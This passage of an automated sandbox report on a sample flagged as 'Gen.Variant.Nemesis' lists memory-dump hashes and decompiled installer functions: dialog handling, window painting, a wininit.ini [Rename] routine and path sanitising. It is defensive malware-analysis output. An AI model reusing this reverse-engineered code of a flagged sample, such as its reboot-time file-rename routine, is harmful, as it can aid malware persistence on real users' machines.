                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f006597962ce433eb7da19a5a2503c7cdac020e00adc7794ef7e2111b422805
                                                                          • Instruction ID: a44eb3db6c36ca9e6e21fbdd085eda825f6f3704af899740aea78f91e1547cb2
                                                                          • Opcode Fuzzy Hash: 8f006597962ce433eb7da19a5a2503c7cdac020e00adc7794ef7e2111b422805
                                                                          • Instruction Fuzzy Hash: 195123716443499FDB30AE68CDE47DB3BA3AF99790F82412DDC895B208C7354A86CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e0a8bffae7fb6bae6906773f487639cc18629bd571660c894358cfa25b063d47
                                                                          • Instruction ID: 2ecdf43cbb34dae3e65f3ed941f433e1d8e80fecdbb343a5dd9cffa0f9b12bb6
                                                                          • Opcode Fuzzy Hash: e0a8bffae7fb6bae6906773f487639cc18629bd571660c894358cfa25b063d47
                                                                          • Instruction Fuzzy Hash: B4516A78741B8ACFEB116D3449A23E677E3EFA32A0F54D098CCD54B246D331488ADB41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ea1d8977f9376b643a50c4bd1bbce413083cc2e8dbd7d8796b6cd384319dbd3
                                                                          • Instruction ID: d9898a7c3e4058e36a1d277d27a625bac3da6ceb1eef7c698c5271ed6d15c4d5
                                                                          • Opcode Fuzzy Hash: 3ea1d8977f9376b643a50c4bd1bbce413083cc2e8dbd7d8796b6cd384319dbd3
                                                                          • Instruction Fuzzy Hash: A0519A72A403499FDF309EA485783EFB3E2EF16390F56446ADCC89B205D7349986DB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 976a7577eb56aae658483f6c4ff20e1a7cbb0013854a5512fc1832b13fc46ee5
                                                                          • Instruction ID: 7fe116de4b50bf17b3e691df0f1d781834d0b8a78215bcbc4580230955835b8c
                                                                          • Opcode Fuzzy Hash: 976a7577eb56aae658483f6c4ff20e1a7cbb0013854a5512fc1832b13fc46ee5
                                                                          • Instruction Fuzzy Hash: 5C5125756403499FDF30AE68CDE47DB37A3AF99790F92802DDC895B204C7354A86CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 35d1712c0bcd973e3d757f67b628e501ecc97c5c397f85fde609030869619767
                                                                          • Instruction ID: da1aec9adc9d9034625eb5790b0b4e87427be578e31d366826d1b9f28777d634
                                                                          • Opcode Fuzzy Hash: 35d1712c0bcd973e3d757f67b628e501ecc97c5c397f85fde609030869619767
                                                                          • Instruction Fuzzy Hash: C341F316E3D3058BE70130BA459C3FA2343FF62791E558AB58E6B532A1F30F0489C6C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5bd55b5e107a8ff62a24009537750716d37a22a8b434df3ca0506bc777fda885
                                                                          • Instruction ID: bf58dc852c15857af56e1ec060375d32c5224463e48c5d089e9d64bd1959f097
                                                                          • Opcode Fuzzy Hash: 5bd55b5e107a8ff62a24009537750716d37a22a8b434df3ca0506bc777fda885
                                                                          • Instruction Fuzzy Hash: 22218E28724706979B0425FC56F93FA32979F623A4EDD816A8EC797215D31E008A8A82
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c08b41a6fd827e776d7a81d93152080dad8a1eb843b68eb933a38c29e14cc3d4
                                                                          • Instruction ID: 179659e29c11bbab1bb25ae4bf734b2a30074f2380bdd36b86ba564a6ad45b2e
                                                                          • Opcode Fuzzy Hash: c08b41a6fd827e776d7a81d93152080dad8a1eb843b68eb933a38c29e14cc3d4
                                                                          • Instruction Fuzzy Hash: 2131C33574534A8FCB24AE6CC8E47E623A2EF27754F995269DC8D8B206F3308887C705
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ea6b0e64d8f0aa1bc8318cc8128354928353658884dbd13bc2af0d8004781281
                                                                          • Instruction ID: 3622e9aa0c8d680a26f9d5e3c14590e9ee42d1768a489cb22d32f2a6869749d5
                                                                          • Opcode Fuzzy Hash: ea6b0e64d8f0aa1bc8318cc8128354928353658884dbd13bc2af0d8004781281
                                                                          • Instruction Fuzzy Hash: BC11A06878254ACEFF255D25460B3F52BDBFB77320B8CA6C4C9808B206E36C09478B41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a288f3f3432c0945d414b6a011cf89bf6bcd499a545fe11f31753be66845c15
                                                                          • Instruction ID: d8661530ab78d413389c0a6f0b0cc6dac20fc55475c64e1fb83ae7e7a23b2106
                                                                          • Opcode Fuzzy Hash: 1a288f3f3432c0945d414b6a011cf89bf6bcd499a545fe11f31753be66845c15
                                                                          • Instruction Fuzzy Hash: 2AB09231210540CFCA41CE08C1A0F8073A0BB14A40B810480E8818BB12C324ED01CB00
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			E004043B4(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                          				intOrPtr _v8;
                                                                          				int _v12;
                                                                          				void* _v16;
                                                                          				struct HWND__* _t56;
                                                                          				intOrPtr _t69;
                                                                          				signed int _t75;
                                                                          				signed short* _t76;
                                                                          				signed short* _t78;
                                                                          				long _t92;
                                                                          				int _t103;
                                                                          				signed int _t110;
                                                                          				intOrPtr _t113;
                                                                          				WCHAR* _t114;
                                                                          				signed int* _t116;
                                                                          				WCHAR* _t117;
                                                                          				struct HWND__* _t118;
                                                                          
                                                                          				if(_a8 != 0x110) {
                                                                          					if(_a8 != 0x111) {
                                                                          						L13:
                                                                          						if(_a8 != 0x4e) {
                                                                          							if(_a8 == 0x40b) {
                                                                          								 *0x42b214 =  *0x42b214 + 1;
                                                                          							}
                                                                          							L27:
                                                                          							_t114 = _a16;
                                                                          							L28:
                                                                          							return E0040427E(_a8, _a12, _t114);
                                                                          						}
                                                                          						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                          						_t114 = _a16;
                                                                          						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                          							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                          							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                          							_v12 = _t103;
                                                                          							_v16 = _t113;
                                                                          							_v8 = 0x432e80;
                                                                          							if(_t103 - _t113 < 0x800) {
                                                                          								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                          								SetCursor(LoadCursorW(0, 0x7f02));
                                                                          								_push(1);
                                                                          								E00404663(_a4, _v8);
                                                                          								SetCursor(LoadCursorW(0, 0x7f00));
                                                                          								_t114 = _a16;
                                                                          							}
                                                                          						}
                                                                          						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                          							goto L28;
                                                                          						} else {
                                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                          								SendMessageW( *0x434ee8, 0x111, 1, 0);
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                          								SendMessageW( *0x434ee8, 0x10, 0, 0);
                                                                          							}
                                                                          							return 1;
                                                                          						}
                                                                          					}
                                                                          					if(_a12 >> 0x10 != 0 ||  *0x42b214 != 0) {
                                                                          						goto L27;
                                                                          					} else {
                                                                          						_t69 =  *0x42c220; // 0x6ccd6c
                                                                          						_t29 = _t69 + 0x14; // 0x6ccd80
                                                                          						_t116 = _t29;
                                                                          						if(( *_t116 & 0x00000020) == 0) {
                                                                          							goto L27;
                                                                          						}
                                                                          						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                          						E00404239(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                          						E0040463F();
                                                                          						goto L13;
                                                                          					}
                                                                          				}
                                                                          				_t117 = _a16;
                                                                          				_t75 =  *(_t117 + 0x30);
                                                                          				if(_t75 < 0) {
                                                                          					_t75 =  *( *0x433ebc - 4 + _t75 * 4);
                                                                          				}
                                                                          				_t76 =  *0x434f38 + _t75 * 2;
                                                                          				_t110 =  *_t76 & 0x0000ffff;
                                                                          				_a8 = _t110;
                                                                          				_t78 =  &(_t76[1]);
                                                                          				_a16 = _t78;
                                                                          				_v16 = _t78;
                                                                          				_v12 = 0;
                                                                          				_v8 = E00404365;
                                                                          				if(_t110 != 2) {
                                                                          					_v8 = E0040432B;
                                                                          				}
                                                                          				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                          				_push(0x22);
                                                                          				E00404217(_a4);
                                                                          				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                          				_push(0x23);
                                                                          				E00404217(_a4);
                                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                          				E00404239( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                          				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                          				E0040424C(_t118);
                                                                          				SendMessageW(_t118, 0x45b, 1, 0);
                                                                          				_t92 =  *( *0x434ef4 + 0x68);
                                                                          				if(_t92 < 0) {
                                                                          					_t92 = GetSysColor( ~_t92);
                                                                          				}
                                                                          				SendMessageW(_t118, 0x443, 0, _t92);
                                                                          				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                          				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                          				 *0x42b214 = 0;
                                                                          				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                          				 *0x42b214 = 0;
                                                                          				return 0;
                                                                          			}

                                                                          APIs
                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                                          • GetSysColor.USER32(?), ref: 00404494
                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                                          • lstrlenW.KERNEL32(?), ref: 004044B5
                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                                          • SendMessageW.USER32(00000000), ref: 00404537
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                                          • SetCursor.USER32(00000000), ref: 004045B6
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                                          • SetCursor.USER32(00000000), ref: 004045D2
                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                          • String ID: +C@$Call$N
                                                                          • API String ID: 3103080414-3697844480
                                                                          • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                          • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                                          • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                          • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 90%
                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                          				struct tagLOGBRUSH _v16;
                                                                          				struct tagRECT _v32;
                                                                          				struct tagPAINTSTRUCT _v96;
                                                                          				struct HDC__* _t70;
                                                                          				struct HBRUSH__* _t87;
                                                                          				struct HFONT__* _t94;
                                                                          				long _t102;
                                                                          				signed int _t126;
                                                                          				struct HDC__* _t128;
                                                                          				intOrPtr _t130;
                                                                          
                                                                          				if(_a8 == 0xf) {
                                                                          					_t130 =  *0x434ef4;
                                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                          					_a8 = _t70;
                                                                          					GetClientRect(_a4,  &_v32);
                                                                          					_t126 = _v32.bottom;
                                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                                          					while(_v32.top < _t126) {
                                                                          						_a12 = _t126 - _v32.top;
                                                                          						asm("cdq");
                                                                          						asm("cdq");
                                                                          						asm("cdq");
                                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                                          						_v32.bottom = _v32.bottom + 4;
                                                                          						_a16 = _t87;
                                                                          						FillRect(_a8,  &_v32, _t87);
                                                                          						DeleteObject(_a16);
                                                                          						_v32.top = _v32.top + 4;
                                                                          					}
                                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                          						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                          						_a16 = _t94;
                                                                          						if(_t94 != 0) {
                                                                          							_t128 = _a8;
                                                                          							_v32.left = 0x10;
                                                                          							_v32.top = 8;
                                                                          							SetBkMode(_t128, 1);
                                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                          							_a8 = SelectObject(_t128, _a16);
                                                                          							DrawTextW(_t128, 0x433ee0, 0xffffffff,  &_v32, 0x820);
                                                                          							SelectObject(_t128, _a8);
                                                                          							DeleteObject(_a16);
                                                                          						}
                                                                          					}
                                                                          					EndPaint(_a4,  &_v96);
                                                                          					return 0;
                                                                          				}
                                                                          				_t102 = _a16;
                                                                          				if(_a8 == 0x46) {
                                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x434ee8;
                                                                          				}
                                                                          				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                          			}














                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F
                                                                          • API String ID: 941294808-1304234792
                                                                          • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                          • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                          • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                          • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405ECE(void* __ecx) {
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				long _t12;
                                                                          				long _t24;
                                                                          				char* _t31;
                                                                          				int _t37;
                                                                          				void* _t38;
                                                                          				intOrPtr* _t39;
                                                                          				long _t42;
                                                                          				WCHAR* _t44;
                                                                          				void* _t46;
                                                                          				void* _t48;
                                                                          				void* _t49;
                                                                          				void* _t52;
                                                                          				void* _t53;
                                                                          
                                                                          				_t38 = __ecx;
                                                                          				_t44 =  *(_t52 + 0x14);
                                                                          				 *0x4308e8 = 0x55004e;
                                                                          				 *0x4308ec = 0x4c;
                                                                          				if(_t44 == 0) {
                                                                          					L3:
                                                                          					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4310e8, 0x400);
                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                          						_t37 = wsprintfA(0x4304e8, "%ls=%ls\r\n", 0x4308e8, 0x4310e8);
                                                                          						_t53 = _t52 + 0x10;
                                                                          						E004062A4(_t37, 0x400, 0x4310e8, 0x4310e8,  *((intOrPtr*)( *0x434ef4 + 0x128)));
                                                                          						_t12 = E00405D74(0x4310e8, 0xc0000000, 4);
                                                                          						_t48 = _t12;
                                                                          						 *(_t53 + 0x18) = _t48;
                                                                          						if(_t48 != 0xffffffff) {
                                                                          							_t42 = GetFileSize(_t48, 0);
                                                                          							_t6 = _t37 + 0xa; // 0xa
                                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                          							if(_t46 == 0 || E00405DF7(_t48, _t46, _t42) == 0) {
                                                                          								L18:
                                                                          								return CloseHandle(_t48);
                                                                          							} else {
                                                                          								if(E00405CD9(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                          									_t49 = E00405CD9(_t38, _t21 + 0xa, "\n[");
                                                                          									if(_t49 == 0) {
                                                                          										_t48 =  *(_t53 + 0x18);
                                                                          										L16:
                                                                          										_t24 = _t42;
                                                                          										L17:
                                                                          										E00405D2F(_t24 + _t46, 0x4304e8, _t37);
                                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                                          										E00405E26(_t48, _t46, _t42 + _t37);
                                                                          										GlobalFree(_t46);
                                                                          										goto L18;
                                                                          									}
                                                                          									_t39 = _t46 + _t42;
                                                                          									_t31 = _t39 + _t37;
                                                                          									while(_t39 > _t49) {
                                                                          										 *_t31 =  *_t39;
                                                                          										_t31 = _t31 - 1;
                                                                          										_t39 = _t39 - 1;
                                                                          									}
                                                                          									_t24 = _t49 - _t46 + 1;
                                                                          									_t48 =  *(_t53 + 0x18);
                                                                          									goto L17;
                                                                          								}
                                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                          								_t42 = _t42 + 0xa;
                                                                          								goto L16;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					CloseHandle(E00405D74(_t44, 0, 1));
                                                                          					_t12 = GetShortPathNameW(_t44, 0x4308e8, 0x400);
                                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                                          						goto L3;
                                                                          					}
                                                                          				}
                                                                          				return _t12;
                                                                          			}




















                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                                          • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                            • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                            • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                          • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                                          • wsprintfA.USER32 ref: 00405F4D
                                                                          • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                            • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                            • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                          • String ID: %ls=%ls$[Rename]
                                                                          • API String ID: 2171350718-461813615
                                                                          • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                                          • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                                          • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                                          • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			E00406516(WCHAR* _a4) {
                                                                          				short _t5;
                                                                          				short _t7;
                                                                          				WCHAR* _t19;
                                                                          				WCHAR* _t20;
                                                                          				WCHAR* _t21;
                                                                          
                                                                          				_t20 = _a4;
                                                                          				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                          					_t20 =  &(_t20[4]);
                                                                          				}
                                                                          				if( *_t20 != 0 && E00405BCA(_t20) != 0) {
                                                                          					_t20 =  &(_t20[2]);
                                                                          				}
                                                                          				_t5 =  *_t20;
                                                                          				_t21 = _t20;
                                                                          				_t19 = _t20;
                                                                          				if(_t5 != 0) {
                                                                          					do {
                                                                          						if(_t5 > 0x1f &&  *((short*)(E00405B80(L"*?|<>/\":", _t5))) == 0) {
                                                                          							E00405D2F(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                          							_t19 = CharNextW(_t19);
                                                                          						}
                                                                          						_t20 = CharNextW(_t20);
                                                                          						_t5 =  *_t20;
                                                                          					} while (_t5 != 0);
                                                                          				}
                                                                          				 *_t19 =  *_t19 & 0x00000000;
                                                                          				while(1) {
                                                                          					_push(_t19);
                                                                          					_push(_t21);
                                                                          					_t19 = CharPrevW();
                                                                          					_t7 =  *_t19;
                                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                          						break;
                                                                          					}
                                                                          					 *_t19 =  *_t19 & 0x00000000;
                                                                          					if(_t21 < _t19) {
                                                                          						continue;
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				return _t7;
                                                                          			}









                                                                          APIs
